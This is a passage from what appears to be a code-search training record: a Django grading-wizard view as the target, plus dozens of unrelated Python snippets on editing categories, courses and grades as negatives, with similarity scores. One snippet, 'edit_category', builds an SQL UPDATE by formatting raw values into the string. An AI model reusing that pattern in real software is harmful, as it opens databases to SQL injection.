'rounding': settings.CATEGORY_GRADE_QUANTIZATION\n })\n else:\n raise PermissionDenied(\"This category does not exist.\")", "def change_votes(request, course_id, field):\r\n\r\n for key in request.POST:\r\n if key == 'op' or key == 'field':\r\n continue\r\n problem_id, answer, pk, new_votes = request.POST.getlist(key)\r\n problem_key = course_id.make_usage_key_from_deprecated_string(problem_id)\r\n this_problem = XModuleUserStateSummaryField.objects.get(field_name=field, usage_id=problem_key)\r\n problem_dict = json.loads(this_problem.value)\r\n # problem_dict[answer][pk] points to a [hint_text, #votes] pair.\r\n problem_dict[answer][pk][1] = int(new_votes)\r\n this_problem.value = json.dumps(problem_dict)\r\n this_problem.save()", "def take_test(exam, student):\n\n student.score = exam.administer()", "def edit_category(category):\n # Verify user login. If not, redirect to login page.\n login_status = None\n if 'email' in login_session:\n login_status = True\n else:\n flash('Please log in.')\n return redirect(url_for('home'))\n if request.method == 'POST':\n # Query database with SQLAlchemy and store query as an object\n category = (session.query(Categories)\n .filter_by(name=category.replace('-', ' '))\n .one())\n # Get form fields\n edit_category_name = request.form['edit_category_name']\n # Get user's database ID\n user_db_id = (session.query(Users)\n .filter_by(email=login_session['email'])\n .one()).id\n # Get database ID of category creator\n creator_db_id = category.creator_db_id\n print(\"Current user's database primary key id is {}.\"\n .format(user_db_id))\n print(\"Category creator's database primary key id is {}.\"\n .format(creator_db_id))\n print('Category to edit is \"{}\".'.format(category.name))\n # Only allow creator to edit. If not, redirect to login.\n if user_db_id != creator_db_id:\n flash('Only the creator can edit. Please log in as creator.')\n return redirect(url_for('home'))\n # Flash messages for incomplete item info\n if not request.form['edit_category_name']:\n flash('Please identify category.')\n return redirect(url_for('edit_category'))\n # Overwrite object with new info for database\n category.name = edit_category_name\n print('Category name for database is \"{}\".'.format(category.name))\n session.add(category)\n session.commit()\n # Return to homepage\n return redirect(url_for('home'))\n else:\n # Render webpage\n return render_template('edit_category.html',\n category_name=category,\n login_status=login_status)", "def edit(self, *args, **kw):\n\t\t\ttmpl_context.widget = self.edit_form\n\t\t\tpks \t\t= self.provider.get_primary_fields(self.model)\n\t\t\tkw \t\t\t= {}\n\n\t\t\tfor i, pk in enumerate(pks):\n\t\t\t\tkw[pk] \t\t= args[i]\n\n\t\t\tvalue \t\t= self.edit_filler.get_value(kw)\n\t\t\tvalue['_method'] \t= 'PUT'\n\n\t\t\treturn dict(value = value, model = self.model.__name__, pk_count = len(pks))", "def test_update_category(self):\n pass", "def update(request):\n\tcourse_id = request.GET.get('course_id')\n\tif request.method == 'POST':\n\t\tcourse_title = request.POST['course_title']\n\t\tinstitute_name = request.POST['institute_name']\n\t\tcourse_desc = request.POST['course_desc']\n\t\tcurrent_data = Course.objects.get(course_id = course_id)\n\t\tcurrent_data.course_title = course_title\n\t\tcurrent_data.institute_name = institute_name\n\t\tcurrent_data.course_desc = course_desc\n\t\tcurrent_data.save()\n\t\treturn HttpResponseRedirect(reverse('courseapp:index'))\n\tdata = Course.objects.get(course_id = course_id)\n\treturn render(request,'update.html',{'data':data})", "def test_superuser_edit_assessment(self):\n req, resp = data.assessment_02_request, data.assessment_02_response\n resp['contract'] = self.contract['id']\n\n response = self.superuser.put(self.assessment_custom_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n response = self.superuser.patch(self.assessment_custom_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def modificarcategoria(self, categoria):\n self.categoria=categoria", "def edit_change_plan_actio(\r\n self, original_step: int, change_plan_action: ChangePlanAction\r\n ) -> None:\r\n try:\r\n conditions = []\r\n conditions.append(\r\n ChangePlanActionEntry.change_plan_id\r\n == change_plan_action.change_plan_id\r\n )\r\n conditions.append(ChangePlanActionEntry.step == original_step)\r\n conditions.append(ChangePlanActionEntry.action != Constants.COLLATERAL_KEY)\r\n\r\n old_entry: ChangePlanActionEntry = ChangePlanActionEntry.query.filter(\r\n and_(*conditions)\r\n ).first()\r\n\r\n # Deleting old colateral conditions\r\n conditions_colat = []\r\n conditions_colat.append(\r\n ChangePlanActionEntry.change_plan_id\r\n == change_plan_action.change_plan_id\r\n )\r\n conditions_colat.append(ChangePlanActionEntry.step == original_step)\r\n conditions_colat.append(\r\n ChangePlanActionEntry.action == Constants.COLLATERAL_KEY\r\n )\r\n\r\n ChangePlanActionEntry.query.filter(and_(*conditions_colat)).delete()\r\n\r\n # Edit sequence of actions if order changes\r\n if original_step != change_plan_action.step:\r\n self._edit_change_plan_sequence(\r\n change_plan_action.change_plan_id,\r\n original_step,\r\n change_plan_action.step,\r\n )\r\n\r\n old_entry.step = change_plan_action.step\r\n old_entry.action = change_plan_action.action\r\n old_entry.original_asset_number = change_plan_action.original_asset_number\r\n old_entry.new_record = change_plan_action.new_record\r\n\r\n db.session.commit()\r\n except:\r\n print(\r\n f\"Failed to update change plan action on asset {change_plan_action.original_asset_number}\"\r\n )", "def test_update_preferences_by_category(self):\n # This method utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\n pass", "def editCategory(category_id):\n\n if 'username' not in login_session:\n return redirect('/login')\n\n editedCategory = session.query(Category).filter_by(id=category_id).one()\n if editedCategory.user_id != login_session['user_id']:\n flash('You are not the creator of %s category, and cannot modify it' %\n editedCategory.name)\n return redirect(url_for('showCategories'))\n else:\n if request.method == 'POST':\n if \"btn_edit\" in request.form:\n if request.form['name']:\n editedCategory.name = request.form['name']\n flash('Category Successfully Edited %s' %\n editedCategory.name)\n return redirect(url_for('showCategories'))\n else:\n return redirect(url_for('showCategories'))\n else:\n return redirect(url_for('showCategories'))\n else:\n return render_template('editCategory.html',\n category=editedCategory,\n user=getUserInfo(login_session['user_id']))", "def assignment_grade(id, session_id, course_id):\n\n user_id = session.get('user_id')\n\n con = db.get_db()\n cur = con.cursor()\n cur.execute(\"\"\"SELECT DISTINCT(ROUND(grades.points_received / grades.total_points, 2) * 100) as assignment_grade,\n grades.total_points as total, grades.points_received as earned,\n grades.submission as submission, grades.feedback as feedback,\n grades.student_id, grades.assignment_id as assign_id, assignments.name as assign_name,\n assignments.description as description,\n grades.grade_id, roster.session_id as class_session, courses.name as name\n\t FROM courses JOIN sessions on courses.course_id=sessions.id\n\t JOIN assignments on assignments.session_id=sessions.id\n JOIN grades on grades.assignment_id=assignments.assignment_id\n JOIN roster on roster.session_id=sessions.id\n WHERE grades.assignment_id= %s\n AND grades.student_id= %s\"\"\",\n (id, user_id))\n\n grade = cur.fetchone()\n cur.close()\n con.close()\n\n return render_template(\"/layouts/gradebook/assignment_grade.html\", course_id=course_id, session_id=session_id, id=id, grade=grade)", "def edit():", "def test_update_category(self):\n category = sample_category()\n url = category_details_url(category.id)\n self.client.put(url, {\"name\": \"school\"})\n category.refresh_from_db()\n self.assertEqual(category.name, 'school')", "def addGrade(self, student, grade):\n try:\n self.grades[student.getIDNumber()].append(grade)\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def updateEMPStudy(self, study_id, study_name, investigation_type, miens_compliant, submit_to_insdc, \n portal_type, study_title, study_alias, pmid, study_abstract, study_description,\n number_samples_collected, number_samples_promised , lab_person,\n lab_person_contact, emp_person, first_contact, most_recent_contact, sample_type, \n has_physical_specimen, has_extracted_data, timeseries, spatial_series,\n principal_investigator, principal_investigator_contact, default_emp_status, funding,\n includes_timeseries):\n con = self.getMetadataDatabaseConnection()\n results = con.cursor().callproc('qiime_assets.emp_study_update', \n [study_id, study_name, investigation_type, miens_compliant, submit_to_insdc, portal_type, \n study_title, study_alias, pmid, study_abstract, study_description,\n number_samples_collected, number_samples_promised , lab_person,\n lab_person_contact, emp_person, first_contact, most_recent_contact, sample_type, \n has_physical_specimen, has_extracted_data, timeseries, spatial_series,\n principal_investigator, principal_investigator_contact, default_emp_status, funding,\n includes_timeseries])", "def _editClickedSlot(self):\r\n\r\n index = self.propertiesTableView.selectionModel().currentIndex()\r\n if index.isValid():\r\n self.propertiesTableView.edit(index)", "def post_instructor():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n if request.form['password'] != config['instructor_password']:\n return \"Sorry, wrong password.\"\n\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n grades = json.loads(populate(\"{}{}\".format(UPLOAD_FOLDER,(file.filename).replace(\" \", \"_\"))))\n\n for student in grades:\n try:\n db.session.delete(User.query.filter_by(hash=student).first())\n except UnmappedInstanceError:\n pass\n sqlStudent = User(student, grades[student])\n # sqlStudent = User.query.filter_by(hash=student).first()\n # sqlStudent.grades = grades[student]\n db.session.add(sqlStudent)\n\n db.session.commit()\n\n return \"Grades Updated. Success!\"", "def add_course_grade(self, course, grade):\n course_grade_tuple = (course, grade)\n self.courses_grades.append(course_grade_tuple)", "def put(self, request, pk):\n data = request.data\n data.pop('skills')\n Department_name = data.pop('department')\n department = Department.objects.get(name=Department_name)\n manager_name = data.pop('manager')\n manager = Manager.objects.get(name=manager_name)\n EmployeeDetail.objects.filter(pk=pk).update(department=department, manager=manager, **data)\n return Response(\n data=\"request.data\"\n )", "def update_category_item(catalog_item_id):\n edited_item = session.query(CatalogItem). \\\n filter_by(id=catalog_item_id).one()\n if request.form['name']:\n edited_item.name = request.form['name']\n if request.form['description']:\n edited_item.description = request.form['description']\n if request.form['price']:\n edited_item.price = request.form['price']\n session.add(edited_item)\n session.commit()", "def put(self, request, pk):\n return self.post(request, pk)", "def edit(self, *args, **kw):\n tmpl_context.widget = self.edit_form\n #pks = self.provider.get_primary_fields(self.model)\n \n log.debug(\"soyRomperLB= %s\" %kw)\n\n ###########################################\n pks = self.provider.get_primary_fields(self.model)\n \n ###########################################\n kw = {}\n for i, pk in enumerate(pks):\n kw[pk] = args[i]\n value = self.edit_filler.get_value(kw)\n value['_method'] = 'PUT'\n return dict(value=value, model=self.model.__name__, pk_count=len(pks))", "def approve(request, course_id, field):\r\n\r\n for key in request.POST:\r\n if key == 'op' or key == 'field':\r\n continue\r\n problem_id, answer, pk = request.POST.getlist(key)\r\n problem_key = course_id.make_usage_key_from_deprecated_string(problem_id)\r\n # Can be optimized - sort the delete list by problem_id, and load each problem\r\n # from the database only once.\r\n problem_in_mod = XModuleUserStateSummaryField.objects.get(field_name=field, usage_id=problem_key)\r\n problem_dict = json.loads(problem_in_mod.value)\r\n hint_to_move = problem_dict[answer][pk]\r\n del problem_dict[answer][pk]\r\n problem_in_mod.value = json.dumps(problem_dict)\r\n problem_in_mod.save()\r\n\r\n problem_in_hints = XModuleUserStateSummaryField.objects.get(field_name='hints', usage_id=problem_key)\r\n problem_dict = json.loads(problem_in_hints.value)\r\n if answer not in problem_dict:\r\n problem_dict[answer] = {}\r\n problem_dict[answer][pk] = hint_to_move\r\n problem_in_hints.value = json.dumps(problem_dict)\r\n problem_in_hints.save()", "def editCategory(category_id):\n\n edited_category = session.query(Category).filter_by(id=category_id).first()\n if edited_category.user_id != login_session['user_id']:\n flash(\"You are authorised to Edit category created by You only!\")\n\n return redirect(url_for(\"showCatalog\"))\n\n if request.method == 'POST':\n if request.form['name'] != '':\n edited_category.name = request.form['name']\n session.add(edited_category)\n session.commit()\n flash('Category Successfully Edited %s' % edited_category.\n name)\n return redirect(url_for('showCatalog'))\n else:\n flash(\"Error editing category!\")\n return render_template('editCategory.html',\n category=edited_category)\n else:\n return render_template('editcategory.html',\n category=edited_category)", "def edit_category(self, category_id, category_name, parent_id):\n # [todo] - all parameters except category_id optional, fill others with\n # current values\n\n # [todo] - validate category_id\n # [todo] - validate new values\n\n # open a cursor\n cur = self.get_cursor()\n\n stmt = \"UPDATE categories \" + \\\n \"SET parent_id='{0}', \".format(parent_id) + \\\n \"category_name='{0}' \".format(category_name) + \\\n \"WHERE category_id={0}\".format(category_id)\n\n cur.execute(stmt)\n\n # close the cursor\n self.close_cursor()", "def put(self):\n request = transforms.loads(self.request.get('request'))\n key = request.get('key')\n\n if not self.assert_xsrf_token_or_fail(\n request, 'lesson-edit', {'key': key}):\n return\n\n if not CourseOutlineRights.can_edit(self):\n transforms.send_json_response(\n self, 401, 'Access denied.', {'key': key})\n return\n\n course = courses.Course(self)\n lesson = course.find_lesson_by_id(None, key)\n if not lesson:\n transforms.send_json_response(\n self, 404, 'Object not found.', {'key': key})\n return\n\n payload = request.get('payload')\n updates_dict = transforms.json_to_dict(\n transforms.loads(payload), self.SCHEMA_DICT)\n\n lesson.title = updates_dict['title']\n lesson.unit_id = updates_dict['unit_id']\n lesson.objectives = updates_dict['objectives']\n lesson.video = updates_dict['video']\n lesson.notes = updates_dict['notes']\n lesson.activity_title = updates_dict['activity_title']\n lesson.activity_listed = updates_dict['activity_listed']\n lesson.now_available = not updates_dict['is_draft']\n\n activity = updates_dict.get('activity', '').strip()\n errors = []\n if activity:\n lesson.has_activity = True\n course.set_activity_content(lesson, activity, errors=errors)\n else:\n lesson.has_activity = False\n fs = self.app_context.fs\n path = fs.impl.physical_to_logical(course.get_activity_filename(\n lesson.unit_id, lesson.lesson_id))\n if fs.isfile(path):\n fs.delete(path)\n\n if not errors:\n assert course.update_lesson(lesson)\n course.save()\n transforms.send_json_response(self, 200, 'Saved.')\n else:\n transforms.send_json_response(self, 412, '\\n'.join(errors))", "def case_detail_update_view(request, pk):\n issue = _get_issue(request, pk)\n serializer = IssueDetailSerializer(data=request.data, instance=issue, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({\"issue\": IssueDetailSerializer(issue).data})", "def test_update_enrollment_term(self):\n # This method utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\n pass", "def bulk_beta_modify_access(request, course_id):\r\n course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n action = request.GET.get('action')\r\n identifiers_raw = request.GET.get('identifiers')\r\n identifiers = _split_input_list(identifiers_raw)\r\n email_students = request.GET.get('email_students') in ['true', 'True', True]\r\n auto_enroll = request.GET.get('auto_enroll') in ['true', 'True', True]\r\n results = []\r\n rolename = 'beta'\r\n course = get_course_by_id(course_id)\r\n\r\n email_params = {}\r\n if email_students:\r\n email_params = get_email_params(course, auto_enroll=auto_enroll)\r\n\r\n for identifier in identifiers:\r\n try:\r\n error = False\r\n user_does_not_exist = False\r\n user = get_student_from_identifier(identifier)\r\n\r\n if action == 'add':\r\n allow_access(course, user, rolename)\r\n elif action == 'remove':\r\n revoke_access(course, user, rolename)\r\n else:\r\n return HttpResponseBadRequest(strip_tags(\r\n \"Unrecognized action '{}'\".format(action)\r\n ))\r\n except User.DoesNotExist:\r\n error = True\r\n user_does_not_exist = True\r\n # catch and log any unexpected exceptions\r\n # so that one error doesn't cause a 500.\r\n except Exception as exc: # pylint: disable=broad-except\r\n log.exception(\"Error while #{}ing student\")\r\n log.exception(exc)\r\n error = True\r\n else:\r\n # If no exception thrown, see if we should send an email\r\n if email_students:\r\n send_beta_role_email(action, user, email_params)\r\n # See if we should autoenroll the student\r\n if auto_enroll:\r\n # Check if student is already enrolled\r\n if not CourseEnrollment.is_enrolled(user, course_id):\r\n CourseEnrollment.enroll(user, course_id)\r\n\r\n finally:\r\n # Tabulate the action result of this email address\r\n results.append({\r\n 'identifier': identifier,\r\n 'error': error,\r\n 'userDoesNotExist': user_does_not_exist\r\n })\r\n\r\n response_payload = {\r\n 'action': action,\r\n 'results': results,\r\n }\r\n return JsonResponse(response_payload)", "def get_d3_section_grade_distrib(course_id, section):\r\n\r\n # Retrieve course object down to problems\r\n course = modulestore().get_course(course_id, depth=4)\r\n\r\n problem_set = []\r\n problem_info = {}\r\n c_subsection = 0\r\n for subsection in course.get_children()[section].get_children():\r\n c_subsection += 1\r\n c_unit = 0\r\n for unit in subsection.get_children():\r\n c_unit += 1\r\n c_problem = 0\r\n for child in unit.get_children():\r\n if (child.location.category == 'problem'):\r\n c_problem += 1\r\n problem_set.append(child.location)\r\n problem_info[child.location] = {\r\n 'id': child.location.to_deprecated_string(),\r\n 'x_value': \"P{0}.{1}.{2}\".format(c_subsection, c_unit, c_problem),\r\n 'display_name': own_metadata(child).get('display_name', ''),\r\n }\r\n\r\n # Retrieve grade distribution for these problems\r\n grade_distrib = get_problem_set_grade_distrib(course_id, problem_set)\r\n\r\n d3_data = []\r\n\r\n # Construct data for each problem to be sent to d3\r\n for problem in problem_set:\r\n stack_data = []\r\n\r\n if problem in grade_distrib: # Some problems have no data because students have not tried them yet.\r\n max_grade = float(grade_distrib[problem]['max_grade'])\r\n for (grade, count_grade) in grade_distrib[problem]['grade_distrib']:\r\n percent = 0.0\r\n if max_grade > 0:\r\n percent = round((grade * 100.0) / max_grade, 1)\r\n\r\n # Construct tooltip for problem in grade distibution view\r\n tooltip = {\r\n 'type': 'problem',\r\n 'problem_info_x': problem_info[problem]['x_value'],\r\n 'count_grade': count_grade,\r\n 'percent': percent,\r\n 'problem_info_n': problem_info[problem]['display_name'],\r\n 'grade': grade,\r\n 'max_grade': max_grade,\r\n }\r\n\r\n stack_data.append({\r\n 'color': percent,\r\n 'value': count_grade,\r\n 'tooltip': tooltip,\r\n })\r\n\r\n d3_data.append({\r\n 'xValue': problem_info[problem]['x_value'],\r\n 'stackData': stack_data,\r\n })\r\n\r\n return d3_data", "def test_edit_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n self.category('Breakfast')\n self.dashboard()\n rv = self.edit_category('JunkFood')\n self.assertIn(b'Category successfully updated', rv.data)", "def test_update_risk_profile_using_put(self):\n pass", "def updateEMPStudyData(self, study_id, study_score, web_app_user_id):\n con = self.getMetadataDatabaseConnection()\n con.cursor().callproc('qiime_assets.update_emp_study_data', [study_id, study_score, web_app_user_id])" ]
[ "0.56488323", "0.5607644", "0.5588034", "0.5586747", "0.555214", "0.5505774", "0.5498233", "0.5445095", "0.52898294", "0.52345645", "0.518912", "0.51739746", "0.5155556", "0.51250327", "0.50697607", "0.50619745", "0.5057049", "0.5050862", "0.5034237", "0.5033281", "0.4990466", "0.49754292", "0.49400035", "0.49347347", "0.49288708", "0.49204296", "0.49062783", "0.48915517", "0.48847646", "0.48528203", "0.4810023", "0.47755864", "0.47561887", "0.47545376", "0.4738277", "0.47354782", "0.47333434", "0.47170523", "0.47149578", "0.47130305", "0.4712754", "0.4709302", "0.470171", "0.46999106", "0.46901187", "0.46872944", "0.46871382", "0.4683078", "0.46817937", "0.4672599", "0.4672299", "0.46718854", "0.4670794", "0.4668548", "0.46673542", "0.46631542", "0.4654718", "0.46505007", "0.46441165", "0.4638318", "0.4631399", "0.46299577", "0.46287143", "0.4619681", "0.46177602", "0.46172968", "0.46063527", "0.4603522", "0.4596664", "0.45954007", "0.458916", "0.45792332", "0.45762542", "0.45719808", "0.45708758", "0.4560271", "0.45513943", "0.45512044", "0.4549635", "0.45416316", "0.45390606", "0.45385453", "0.45321292", "0.45253447", "0.4520341", "0.45172912", "0.45130435", "0.45048884", "0.44970793", "0.44829595", "0.44824842", "0.44806945", "0.4478967", "0.447696", "0.44760814", "0.44678164", "0.44567925", "0.4450641", "0.44504103", "0.44450092", "0.4444816" ]
0.0
-1
Edit grade for a category as indexed by step. For each student as given by pk. Also edit the individual aspects of each grade category. For trackheads and responsible staff
def staff_form(request, pk, step=0): ts = get_timeslot() if not hasattr(ts, 'resultoptions'): raise PermissionDenied("Results menu is not yet visible.") else: if not get_timeslot().resultoptions.Visible: raise PermissionDenied("Results menu is not yet visible.") dstr = get_object_or_404(Distribution, pk=pk) if not hasattr(dstr, 'presentationtimeslot'): raise PermissionDenied('This student does not have a presentation planned. Please plan it first.') if not request.user.is_superuser and \ request.user != dstr.Proposal.Track.Head and \ request.user != dstr.Proposal.ResponsibleStaff and \ (get_grouptype('1') not in request.user.groups.all() or request.user not in dstr.Proposal.Assistants.all()) and \ get_grouptype('3') not in request.user.groups.all() and \ request.user not in dstr.presentationtimeslot.Presentations.Assessors.all(): raise PermissionDenied("You are not the correct owner of this distribution. " "Only track heads and responsible staff can edit grades.") cats = GradeCategory.objects.filter(TimeSlot=get_timeslot()).distinct() numcategories = len(cats) step = int(step) if step == 0: return render(request, "results/wizard.html", { "step": 0, "pk": pk, "categories": cats, "dstr": dstr, "final": all(f.Final is True for f in dstr.results.all()) if dstr.results.all() else False, # fix for all([])=True # "files": files, }) elif step <= numcategories: saved = False cat = cats[step - 1] try: # existing category result cat_result = CategoryResult.objects.get(Distribution=dstr, Category=cat) initial = None except CategoryResult.DoesNotExist: # new result cat_result = CategoryResult(Distribution=dstr, Category=cat) # initial = {'Files': list(StudentFile.objects.filter(Type=cat_result.Category.File, Distribution=cat_result.Distribution).distinct())} if request.method == "POST": # submitted form if cat_result.Final: return render(request, "base.html", context={ "Message": "Category Result has already been finalized! Editing is not allowed anymore. " "If this has to be changed, contact support staff" }) # if files: # category_form = CategoryResultFormFile(request.POST, instance=cat_result, prefix='catform') # else: category_form = CategoryResultForm(request.POST, instance=cat_result, prefix='catform') aspect_forms = [] for i, aspect in enumerate(cat.aspects.all()): try: # try find existing form aspect_result = CategoryAspectResult.objects.get(CategoryResult=cat_result, CategoryAspect=aspect) except CategoryAspectResult.DoesNotExist: # new clean form aspect_result = CategoryAspectResult(CategoryResult=cat_result, CategoryAspect=aspect) aspect_forms.append({ "form": AspectResultForm(request.POST, instance=aspect_result, prefix="aspect" + str(i)), "aspect": aspect, }) if category_form.is_valid() and all([form['form'].is_valid() for form in aspect_forms]): cat_result = category_form.save() # return the form with the cleaned grade, not the one with the (uncleaned) post data: # if files: # category_form = CategoryResultFormFile(instance=cat_result, prefix='catform') # else: category_form = CategoryResultForm(instance=cat_result, prefix='catform') for form in aspect_forms: # these forms do not need to be updated as aspect data is not cleaned. aspect_result = form['form'].instance aspect_result.CategoryResult = cat_result aspect_result.save() saved = True else: # if files: # category_form = CategoryResultFormFile(instance=cat_result, initial=initial, prefix='catform', disabled=cat_result.Final) # else: category_form = CategoryResultForm(instance=cat_result, prefix='catform', disabled=cat_result.Final) aspect_forms = [] for i, aspect in enumerate(cat.aspects.all()): try: aspect_result = CategoryAspectResult.objects.get(CategoryResult=cat_result, CategoryAspect=aspect) except CategoryAspectResult.DoesNotExist: aspect_result = CategoryAspectResult(CategoryResult=cat_result, CategoryAspect=aspect) aspect_forms.append({ "form": AspectResultForm(instance=aspect_result, prefix="aspect" + str(i), disabled=cat_result.Final), "aspect": aspect, }) return render(request, "results/wizard.html", { "step": step, "categories": cats, "category": cat, "categoryform": category_form, "aspectsforms": aspect_forms, "dstr": dstr, "pk": pk, "saved": saved, "final": cat_result.Final, "aspectlabels": CategoryAspectResult.ResultOptions, # "files": files, 'rounding': settings.CATEGORY_GRADE_QUANTIZATION }) else: raise PermissionDenied("This category does not exist.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_course_enrollment(self, student_id, course_id, course_section_id, term):\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n cursor.execute(\n \"\"\"\n UPDATE course_enrollments\n SET course_id = ?, course_section_id = ?\n WHERE student_id = ?\n (?,?,?)\"\"\",\n (course_id, course_section_id, student_id),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1", "def edit_grade(self, username: str, token: str, course_abbreviation: str, student_id: str, updated_grade: float) -> bool:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get the student's UID\n student_uid = self.get_uid(username=student_id)\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Run update in the DB\n cursor.execute('''\n UPDATE enrollment_records SET grade = ? WHERE uid = ? AND course_id = ?\n ''', (updated_grade, student_uid, course_id))\n self._db_connection.commit()\n\n return True", "def update_grade(self, course, grade):\n if course not in self.courses:\n raise NameError('This student is not enrolled in that course')\n else:\n self.courses[course] = grade\n\n return self", "def eval_evalassignment(request, pk, pts):\n student = request.user.student\n evalassignment = Evalassignment.objects.\\\n filter(pk=pk, assignment__student=student).first()\n if evalassignment:\n evalassignment.grade_evaluation = pts\n evalassignment.save()\n redirect_item = '#assignment%s' % evalassignment.assignment.id\n else:\n redirect_item = ''\n return redirect('/dashboard_student/' + redirect_item)", "def edit_course(self, course):\n EDIT_COURSE = \"\"\"UPDATE Course SET subject_code = %s, credit_hours = %s, description = %s WHERE name = %s\"\"\"\n\n self.db_cursor.execute(EDIT_COURSE, (\n course.subject_code, course.credit_hours, course.description, course.name))\n self.db_connection.commit()\n\n DELETE_COURSE_TOPICS = \"\"\"DELETE FROM CourseTopics WHERE course_name = %s\"\"\"\n self.db_cursor.execute(DELETE_COURSE_TOPICS, (course.name,))\n self.db_connection.commit()\n INSERT_COURSE_TOPICS = \"\"\"INSERT INTO CourseTopics (course_name, topic_id) VALUES (%s, %s)\"\"\"\n for ct in course.topics:\n self.db_cursor.execute(INSERT_COURSE_TOPICS, (course.name,ct))\n self.db_connection.commit()\n\n DELETE_COURSE_GOALS = \"\"\"DELETE FROM CourseGoals WHERE course_name = %s\"\"\"\n self.db_cursor.execute(DELETE_COURSE_GOALS, (course.name,))\n self.db_connection.commit()\n INSERT_COURSE_GOALS = \"\"\"INSERT INTO CourseGoals (course_name, goal_id) VALUES (%s, %s)\"\"\"\n for cg in course.goals:\n self.db_cursor.execute(INSERT_COURSE_GOALS, (course.name, cg))\n self.db_connection.commit()", "def update_subcategory(self, control_type, *args):\n\n\t\tif control_type is 'intField':\n\t\t\tself.log('query intField and update others')\n\t\t\tintField_value = cmds.intField(self.grade_intField, query = True, value = True)\n\t\t\tself.log('intField is %s' % intField_value)\n\n\t\t\tself.current_grade_value = intField_value\n\t\t\tself.log('current grade is: %s' % self.current_grade_value)\n\t\t\tcmds.intSlider(self.grade_slider, edit=True, value = -intField_value)\n\t\t\tself.update_radios_default_comments(intField_value)\n\t\t\tself.update_default_comments()\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'slider':\n\n\t\t\tself.log('query slider and update others')\n\t\t\tslider_value = abs(cmds.intSlider(self.grade_slider, query = True, value = True))\n\t\t\tself.log('intSlider is %s' % slider_value)\n\n\t\t\tself.current_grade_value = slider_value\n\t\t\tself.log('current grade is: %s' % self.current_grade_value)\n\t\t\tcmds.intField(self.grade_intField, edit = True, value = slider_value)\n\t\t\tself.update_radios_default_comments(slider_value)\n\t\t\tself.update_default_comments()\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'radioButton':\n\t\t\tself.log('query radio collection and update others')\n\t\t\tselected = cmds.radioCollection(self.grade_radio_collection, query = True, select = True)\n\t\t\tselected_letter = cmds.radioButton(selected, query = True, label = True)\n\t\t\tselected_letter = re.sub('\\\\+', 'plus', selected_letter)\n\t\t\tself.log('selected radioButton: %s' % selected_letter)\n\n\t\t\tself.current_grade_value = int(self.grade_values.find(selected_letter).text)\n\t\t\tself.log('current grade is: %s' % self.current_grade_value)\n\t\t\tcmds.intField(self.grade_intField, edit = True, value = self.current_grade_value)\n\t\t\tcmds.intSlider(self.grade_slider, edit = True, value = -self.current_grade_value)\n\t\t\tself.log('selected_letter: %s' % selected_letter)\n\t\t\t\n\t\t\tcmds.scrollField(self.default_comments, edit = True, text = self.subcatXML.find('gradeComment').find(selected_letter).text)\n\t\t\tself.current_default_comment_text = cmds.scrollField(self.default_comments, query = True, text = True)\n\t\t\tself.log('Default Comments Updated')\n\t\t\tself.log(self.current_default_comment_text)\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'default_comments_text':\n\t\t\tself.current_default_comment_text = cmds.scrollField(self.default_comments, query = True, text = True)\n\t\t\tself.log('Default Comments Updated')\n\t\t\tself.log(self.current_default_comment_text)\n\t\t\tself.update_is_complete()\n\n\t\telif control_type is 'example_comments_text':\n\t\t\tself.current_example_comment_text = cmds.scrollField(self.example_comments, query = True, text = True)\n\t\t\tself.log('examples updated')\n\t\t\tself.log(self.current_example_comment_text)\n\n\t\telse:\n\t\t\tself.current_comment_text = cmds.scrollField(self.comments_text_field, query = True, text = True)\n\t\t\tself.log('comments updated')\n\t\t\tself.log(self.current_comment_text)", "def modify_assignmentype(request, pk):\n prof = request.user.prof\n assignmentype = Assignmentype.objects.filter(id=pk, prof=prof).first()\n if assignmentype:\n if request.method == 'POST':\n form = LightAssignmentypeForm(request.POST, instance=assignmentype)\n if form.is_valid():\n form.save()\n return redirect('/detail_assignmentype/%s/' % assignmentype.pk)\n else:\n form = LightAssignmentypeForm(instance=assignmentype)\n context = {}\n context['assignmentype_id'] = assignmentype.id\n context['message'] = 'Modify details of your assignment '\\\n '(keep current student list)'\n context['form'] = form\n context['type_post'] = 'modify'\n return render(request, 'gradapp/assignmentype_form.html', context)\n else:\n return redirect('gradapp:index')", "def edit_student(request, student_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.student_permit:\n\t\traise Http404\n\tstudent = models.Student.objects.filter(\n\t\tpk=student_id, soft_delete=False\n\t).first()\n\tif not student:\n\t\traise Http404\n\tcontext_dict = {\n\t\t\"all_courses\": context_helper.course_helper(),\n\t\t\"blood_groups\": context_helper.blood_group_helper(),\n\t\t\"guardian_types\": 